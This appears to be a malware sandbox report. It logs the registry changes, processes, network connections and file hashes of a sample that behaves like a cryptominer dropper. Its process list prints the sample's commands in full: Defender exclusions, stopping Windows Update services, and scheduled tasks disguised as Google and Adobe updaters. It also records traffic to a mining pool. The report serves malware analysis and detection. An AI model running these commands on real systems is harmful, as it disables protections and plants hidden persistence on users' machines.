| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe
"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"
C:\Users\Admin\AppData\Local\Temp\mi.exe
"C:\Users\Admin\AppData\Local\Temp\mi.exe"
C:\Users\Admin\AppData\Local\Temp\cli.exe
"C:\Users\Admin\AppData\Local\Temp\cli.exe"
C:\Users\Admin\AppData\Local\Temp\cc.exe
"C:\Users\Admin\AppData\Local\Temp\cc.exe"
C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=31791 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc00439758,0x7ffc00439768,0x7ffc00439778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1368 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1688 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=31791 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1984 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2336 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2516 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3096 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3236 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=31871 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc100446f8,0x7ffc10044708,0x7ffc10044718
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1732 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1668 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3120 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2068 -ip 2068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 284
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process <#datdpvvcoapg#> powershell <#pvuibonxcabzvdcqogx#> -Verb <#pvuibonxcabzvdcqogx#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc daily /st 13:34 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc daily /st 13:34 /f /tn AdobeUpdateTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| PL | 51.83.170.21:19447 | tcp | |
| US | 8.8.8.8:53 | 21.170.83.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.214.58.216.in-addr.arpa | udp |
| N/A | 127.0.0.1:31791 | tcp | |
| N/A | 127.0.0.1:31791 | tcp | |
| N/A | 127.0.0.1:31791 | tcp | |
| N/A | 127.0.0.1:31791 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| N/A | 127.0.0.1:31871 | tcp | |
| N/A | 127.0.0.1:31871 | tcp | |
| N/A | 127.0.0.1:31871 | tcp | |
| N/A | 127.0.0.1:31871 | tcp | |
| US | 8.8.8.8:53 | stratum-eu.rplant.xyz | udp |
| FR | 141.94.192.217:17056 | stratum-eu.rplant.xyz | tcp |
| US | 8.8.8.8:53 | 217.192.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.85.1.163:80 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 163.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| RU | 185.159.129.168:80 | tcp | |
| RU | 185.149.146.118:80 | tcp | |
| RU | 77.91.77.144:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:80 | pastebin.com | tcp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| RU | 46.29.235.84:80 | 46.29.235.84 | tcp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.235.29.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
Files
memory/4880-133-0x0000000000380000-0x00000000003B4000-memory.dmp
memory/4880-134-0x0000000074880000-0x0000000075030000-memory.dmp
memory/4880-135-0x00000000054C0000-0x0000000005AD8000-memory.dmp
memory/4880-136-0x0000000004FB0000-0x00000000050BA000-memory.dmp
memory/4880-137-0x0000000004D40000-0x0000000004D52000-memory.dmp
memory/4880-138-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4880-139-0x0000000004EE0000-0x0000000004F1C000-memory.dmp
memory/4880-140-0x00000000051C0000-0x0000000005236000-memory.dmp
memory/4880-141-0x00000000052E0000-0x0000000005372000-memory.dmp
memory/4880-142-0x0000000006580000-0x0000000006B24000-memory.dmp
memory/4880-143-0x0000000074880000-0x0000000075030000-memory.dmp
memory/4880-144-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/4880-145-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4880-146-0x0000000006020000-0x0000000006070000-memory.dmp
memory/4880-147-0x0000000006B30000-0x0000000006CF2000-memory.dmp
memory/4880-148-0x0000000008BE0000-0x000000000910C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mi.exe
| MD5 | aba23d7f60f40f4dee64fa440d5db6e6 |
| SHA1 | dde62462dc7887a6b3ba193eafb50da17ef40e67 |
| SHA256 | 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6 |
| SHA512 | ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40 |
C:\Users\Admin\AppData\Local\Temp\mi.exe
| MD5 | aba23d7f60f40f4dee64fa440d5db6e6 |
| SHA1 | dde62462dc7887a6b3ba193eafb50da17ef40e67 |
| SHA256 | 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6 |
| SHA512 | ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40 |
C:\Users\Admin\AppData\Local\Temp\mi.exe
| MD5 | aba23d7f60f40f4dee64fa440d5db6e6 |
| SHA1 | dde62462dc7887a6b3ba193eafb50da17ef40e67 |
| SHA256 | 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6 |
| SHA512 | ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40 |
C:\Users\Admin\AppData\Local\Temp\cli.exe
| MD5 | b78141a544759e1a07740aa28b35584c |
| SHA1 | af95ccd7d12c7ed7bdc6782373302118d2ebe3a8 |
| SHA256 | e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d |
| SHA512 | 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959 |
C:\Users\Admin\AppData\Local\Temp\cli.exe
| MD5 | b78141a544759e1a07740aa28b35584c |
| SHA1 | af95ccd7d12c7ed7bdc6782373302118d2ebe3a8 |
| SHA256 | e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d |
| SHA512 | 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959 |
C:\Users\Admin\AppData\Local\Temp\cli.exe
| MD5 | b78141a544759e1a07740aa28b35584c |
| SHA1 | af95ccd7d12c7ed7bdc6782373302118d2ebe3a8 |
| SHA256 | e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d |
| SHA512 | 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959 |
